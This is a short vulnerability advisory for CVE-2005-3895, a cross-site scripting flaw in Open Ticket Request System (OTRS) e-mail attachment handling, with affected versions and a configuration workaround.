CVE-2005-3895

Name of the Vulnerable Software and Affected Versions Open Ticket Request System (OTRS) versions 1.0.0 through 1.3.2 Open Ticket Request System (OTRS) versions 2.0.0 through 2.0.3

Description The issue allows remote attackers to execute arbitrary web script or HTML when the AttachmentDownloadType is set to inline, and the queue moderator attempts to download an e-mail attachment. This can lead to the execution of arbitrary web script or HTML. The problem may be referred to as XSS by some sources. Multiple vulnerabilities in the otrs package of the Debian GNU/Linux operating system can be exploited remotely, leading to a violation of confidentiality, integrity, and availability of protected information.

Recommendations For Open Ticket Request System (OTRS) versions 1.0.0 through 1.3.2, consider changing the AttachmentDownloadType from inline to prevent the rendering of text/html e-mail attachments as HTML in the browser. For Open Ticket Request System (OTRS) versions 2.0.0 through 2.0.3, consider changing the AttachmentDownloadType from inline to prevent the rendering of text/html e-mail attachments as HTML in the browser. At the moment, there is no information about a newer version that contains a fix for this vulnerability.